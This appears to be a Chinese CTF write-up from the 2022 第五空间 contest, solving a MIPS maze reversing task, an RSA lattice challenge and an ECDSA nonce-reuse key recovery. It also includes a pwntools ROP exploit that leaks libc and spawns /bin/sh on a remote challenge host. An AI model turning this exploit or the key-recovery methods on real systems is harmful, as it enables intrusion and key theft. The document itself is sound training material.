-
5_re2
程序中定义了全局变量 level(当前关卡)。
核心逻辑在下面的 move 函数中。
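/*
 * move - read one string of moves and replay it against the maze, level by
 * level. This is Ghidra output for a MIPS binary; the character escapes lost
 * in the listing ('\0', '\x1b') and the indentation are restored here, and
 * the decompiler's nested range comparisons are written as a switch.
 *
 * Input bytes: 'w' -> Up(), 's' -> Down(), 'a' -> Left(), 'd' -> Right().
 * Any other byte is skipped. A step that returns 1 ends the current level.
 *
 * Returns 1 once the level with index 2 has been cleared, or
 * 0xffffffffffffffff as soon as an ESC (0x1b) byte is read.
 *
 * NOTE(review): the scanf format at DAT_120001878 is not shown. If it is an
 * unbounded "%s", input longer than 527 bytes overflows local_228 -- confirm.
 * NOTE(review): local_22c is never compared with the buffer size, so an input
 * that does not finish a level keeps indexing past the end of local_228.
 */
undefined8 move(void)
{
    char cVar1;
    int local_230;          /* result of the last step; 1 means level cleared */
    int local_22c;          /* index of the next input byte to consume */
    char local_228 [528];   /* the whole move string */
    undefined *local_18;

    local_18 = &_mips_gp0_value;
    local_22c = 0;

    /* Zero the buffer: bytes 0 and 1 by hand, the remaining 0x1fe by memset. */
    local_228[0] = '\0';
    local_228[1] = 0;
    memset(local_228 + 2, 0, 0x1fe);

    printf("input: ");
    __isoc99_scanf(&DAT_120001878, local_228);

    for (;;) {
        /* Consume input bytes until one step reports that the level is done. */
        do {
            local_230 = 0;
            find();     /* not shown here; called before every step */
            cVar1 = local_228[local_22c];
            switch (cVar1) {
            case 'w':
                local_230 = Up();
                break;
            case 's':
                local_230 = Down();
                break;
            case 'd':
                local_230 = Right();
                break;
            case 'a':
                local_230 = Left();
                break;
            case '\x1b':
                /* ESC aborts the whole run. */
                return 0xffffffffffffffff;
            default:
                /* Unknown byte: no move, just advance to the next one. */
                break;
            }
            local_22c = local_22c + 1;
        } while (local_230 != 1);

        /* The same input string continues into the next level. */
        if (level == 2) break;
        level = level + 1;
    }

    puts("flag is ctf{md5(your input)}");
    return 1;
}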
w/s/a/d 分别对应上、下、左、右;flag 的格式由最后的 puts 给出:ctf{md5(输入)}。
find 函数中的定义决定了迷宫每一行有多少个值。
按该行宽整理数据,即可得到各个 level 的 map 表。
其中第一个 level 整理后的迷宫表如下:
1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 0, 3, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0,
1, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0,
1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0,
1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0,
1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 0, 3, 1, 1, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 3, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
-
5_1H3ll0Rop
from pwn import*
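# Solve script for the H3ll0Rop challenge (Python 2 + pwntools).
# The escapes that were lost in the listing ('\n\n', '\x00') are restored;
# without them ljust() rejects the multi-character fill string and the
# recvuntil() markers never match.
#
# Flow: the first overflow makes the binary print the runtime address of puts,
# which gives the libc base; the second overflow calls system("/bin/sh").
# NOTE(review): the hard-coded code addresses only stay valid if the binary is
# not position-independent, and the overflow reaches the return address only
# without a stack canary -- both presumably true here; confirm with checksec.
context(os='linux',arch='amd64')
context.log_level=True  # NOTE(review): unusual value; 'debug' is the usual spelling
elf=ELF('H3ll0Rop')
libc=ELF('libc-2.23.so')
#p = process(["./ld-2.27.so", "./a"],env={"LD_PRELOAD":"./libc-2.27.so"})
#p=process('./H3ll0Rop',env={'LD_PRELOAD':'./libc-2.23.so'})
#p=process('./H3ll0Rop')
p=remote('47.94.151.201',51850)

# Stage 1: 0x68 filler bytes, then a chain that calls puts(puts@got).
# 0x400753 is presumably a `pop rdi; ret` gadget and 0x4006CC presumably the
# function that reads the input, so the prompt appears a second time -- confirm.
p.recvuntil('game with me???\n\n')
payload='a'*0x68+p64(0x0000000000400753)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x4006CC)
p.sendline(payload)
p.recvuntil('an pwn it\n\n')

# puts prints the 6 significant bytes of the pointer; pad to 8 before unpacking.
puts=u64(p.recv(6).ljust(8,'\x00'))
libcbase=puts-libc.sym['puts']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search('/bin/sh'))
print(hex(libcbase))  # a correct base normally ends in 000 (page aligned)

# Stage 2: same offset, now calling system("/bin/sh") inside libc.
p.recvuntil('game with me???\n\n')
payload='a'*0x68+p64(0x0000000000400753)+p64(binsh)+p64(system)
#gdb.attach(p)
raw_input()  # pause before sending, e.g. to attach a debugger
p.sendline(payload)
p.interactive()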
-
5_vgcd
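# SageMath script: recover the prime p from the hints in output7.txt, then
# decrypt c. The "\n" escape lost in the listing and the indentation are
# restored.

# output7.txt holds four lines: n, c, t1, t2.
# NOTE(review): eval() executes whatever expression the file contains. That is
# tolerable only because this is a local challenge file; for untrusted input
# parse with int() / ast.literal_eval() instead.
with open("output7.txt") as f:
    data = f.read().split("\n")
n = eval(data[0])
c = eval(data[1])
t1 = eval(data[2])
t2 = eval(data[3])  # read but not used below

# Lattice step: LLL-reduce the matrix built from t1, keep the last three rows
# of the reduced basis and express the first three rows of M in terms of them.
M = Matrix(t1)
K = M.LLL()[-3:]
s = K.solve_left(M[:3])

# For each solution row, try offsets 0..63 on the first and third coefficient
# and print every gcd larger than 2^10.
for ss in s:
    a = abs(ss[0])
    b = abs(ss[2])
    for i in range(2^6):
        for j in range(2^6):
            if gcd(a-i,b-j) > 2^10:
                print(gcd(a-i,b-j))

# Hard-coded from here on; presumably one of the gcd values printed above
# (confirm). It is used as the top eta = 288 bits of a gamma = 512 bit p.
pp = 313246472203572238616195801879608898722966109482769416302463071823547244571165975167479
eta = 288
gamma = 512

# Coppersmith small-roots step: x stands for the missing low gamma-eta bits.
# beta = 0.4 looks for a root modulo a divisor of n of size at least n^0.4.
P.<x> = PolynomialRing(Zmod(n))
f = x+pp*2^(gamma-eta)
r = int(f.small_roots(X = 2^(gamma-eta), beta = 0.4)[0])
p = f(r)

# Decrypt modulo p only, with e = 0x10001 inverted modulo p-1.
from Crypto.Util.number import *
long_to_bytes(pow(c,int(pow(0x10001,-1,p-1)),int(p)))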
-
5_wb
#!/usr/bin/env python
# coding: utf-8
# Notebook export with the cell markers merged: recover an ECDSA private key
# from two signatures that share the same r. An identical r means the signer
# used the same nonce k twice; deterministic nonces (RFC 6979) avoid this.
from ecdsa import ecdsa as ec
import gmpy2
import libnum

# Signature 1 is (r1, s1) over hash h1, signature 2 is (r2, s2) over hash h2.
r1 = r2 = 0xBBDFAC1809250A2BB9415225F7C548CF8C03A5E100F95D52A4AA27F42A2F0FBE
s1, s2 = (
    0x77FB1A7C7FEA54A2A6C7E7535C28868C10549B831411F7A8EBB9F6DE1B4ADDF6,
    0x31213DACD2339525C292FC69F8F828D23A3CA73567BACD8EA2ECE8BF653E97F6,
)
h1, h2 = (
    0,
    0x1000000000000000000000000000000000000000000000000000000000000000,
)

# Group order of the 256-bit generator shipped with python-ecdsa.
g = ec.generator_256
n = g.order()
n  # bare expression: shown by the notebook, no effect in a script

# Decimal literal kept from the original; presumably the value shown for n.
# It is not used below.
N = 115792089210356248762697446949407573529996955224135760342422259061068512044369

# Shared nonce: k = (h1 - h2) / (s1 - s2) mod n.
_inv_ds = gmpy2.invert((s1 - s2), n)
k = ((h1 - h2) * _inv_ds) % n
k

# Private key: d = (s1 * k - h1) / r1 mod n.
_inv_r = gmpy2.invert(r1, n)
d = ((s1 * k - h1) * _inv_r) % n
d

# Hard-coded integer, presumably the d shown above (confirm), converted to
# its byte string.
libnum.n2s(int(2761328357323929781063385491249486142671766712847109466352079855419392))
原文始发于微信公众号(山石网科安全技术研究院):2022年第五空间网络安全大赛WriteUp | Reverse & Pwn & Crypto